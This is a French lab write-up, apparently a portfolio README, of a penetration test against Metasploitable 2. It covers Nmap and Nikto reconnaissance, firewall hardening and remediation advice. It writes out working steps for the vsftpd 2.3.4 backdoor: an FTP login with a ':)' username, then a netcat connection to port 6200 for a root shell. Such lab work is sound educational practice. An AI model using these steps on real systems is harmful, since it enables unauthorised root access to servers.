
Laboratoire virtuel contrôlé d'attaque et de défense — exploitation de CVE-2011-2523, reconnaissance Nmap, analyse Nikto, durcissement UFW sur Metasploitable 2
Un environnement virtuel contrôlé simulant des scénarios d'attaque et de défense réels
Ce laboratoire simule un test d'intrusion réel et un exercice de durcissement défensif dans un environnement virtuel totalement isolé. Il démontre le cycle de vie complet de la sécurité offensive — de la reconnaissance à l'exploitation — et les contrôles défensifs qui atténueraient chaque risque.
Résultat clé : Atteint un accès root complet sur la machine cible en moins de 60 secondes en exploitant une backdoor connue, sans aucun identifiant et sans outils spéciaux.
| Composant | Détails |
|---|---|
| Hyperviseur | VMware Workstation |
| Réseau | Host-Only / NAT (totalement isolé) |
| OS Attaquant | Ubuntu 24 LTS |
| OS Cible | Metasploitable 2 (Linux 2.6.x) |
| IP Attaquant | 192.168.148.255 |
| IP Cible | 192.168.148.130 |
Reconnaissance → Scan → Exploitation → Défense et Durcissement
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Résultats clés — 23 ports ouverts au total :
| Port | Service | Version | Risque |
|---|---|---|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 CRITIQUE — Backdoor connue (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 MOYEN — Obsolète |
| 23 | Telnet | Linux telnetd | 🟠 ÉLEVÉ — Protocole en texte clair |
| 80 | HTTP | Apache 2.2.8 | 🟠 ÉLEVÉ — Plusieurs CVE |
| 1524 | Bindshell | Shell root | 🔴 CRITIQUE — Shell root ouvert |
| 3306 | MySQL | 5.0.51a | 🟠 ÉLEVÉ — Base de données exposée |
| 5900 | VNC | Protocole 3.3 | 🟠 ÉLEVÉ — Authentification faible |
| 6667 | IRC | UnrealIRCd | 🔴 CRITIQUE — Backdoor connue |
nikto -h http://192.168.148.130 -o nikto_before.txt
18 vulnérabilités trouvées, dont :
phpinfo.php fuyant la configuration complète du serveur/doc/, /test/vsftpd 2.3.4 contient une backdoor introduite via une compromission de la chaîne d'approvisionnement. Envoyer un nom d'utilisateur se terminant par :) fait que le serveur ouvre un shell root sur le port 6200.
# Étape 1 — Déclencher la backdoor via FTP
ftp 192.168.148.130
# Nom d'utilisateur : backdoor:) Mot de passe : n'importe quoi
# Étape 2 — Se connecter au shell généré
nc 192.168.148.130 6200
# Étape 3 — Vérifier l'accès
whoami
# → root
Résultat : Accès complet au niveau root obtenu en moins de 60 secondes — aucun identifiant, aucun framework d'exploit requis.
Impact : Un attaquant avec un accès root peut lire/modifier/supprimer tout fichier, installer des logiciels malveillants, exfiltrer des données ou pivoter vers d'autres hôtes sur le réseau.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH uniquement
sudo ufw status verbose
| Vulnérabilité | Correction |
|---|---|
| Backdoor vsftpd 2.3.4 | Mettre à niveau vers vsftpd 3.x ou migrer vers SFTP |
| Shell root ouvert (port 1524) | Désactiver immédiatement, auditer l'installation |
| Telnet (port 23) | Désactiver — imposer SSH uniquement |
| phpMyAdmin exposé | Restreindre par IP, exiger une authentification forte |
| MySQL exposé (port 3306) | Lier à localhost, bloquer l'accès externe |
| VNC exposé (port 5900) | Restreindre par IP ou désactiver |
| Indexation de répertoire | Apache : Options -Indexes |
| HTTP TRACE | Apache : TraceEnable off |
| Apache + PHP obsolètes | Mettre à niveau vers des versions LTS supportées |
Voir report.md pour l'évaluation complète — méthodologie complète, sorties de commandes, tableau des résultats, étapes d'exploitation et toutes les recommandations de correction.
Ce laboratoire a été mené dans un environnement virtuel totalement isolé en utilisant un logiciel intentionnellement vulnérable (Metasploitable 2). Toutes les techniques sont uniquement à des fins éducatives et de portfolio. Ne reproduisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester.
| Outil | Objectif |
|---|---|
| Nmap | Scan de ports et détection de services |
| Nikto | Scan de vulnérabilités Web |
| Netcat | Connexion au shell backdoor |
| UFW | Configuration du pare-feu basé sur l'hôte |
| Client FTP | Déclenchement de la backdoor vsftpd |
| VMware Workstation | Virtualisation du laboratoire |
Auteur : Amir Mohammad Marwi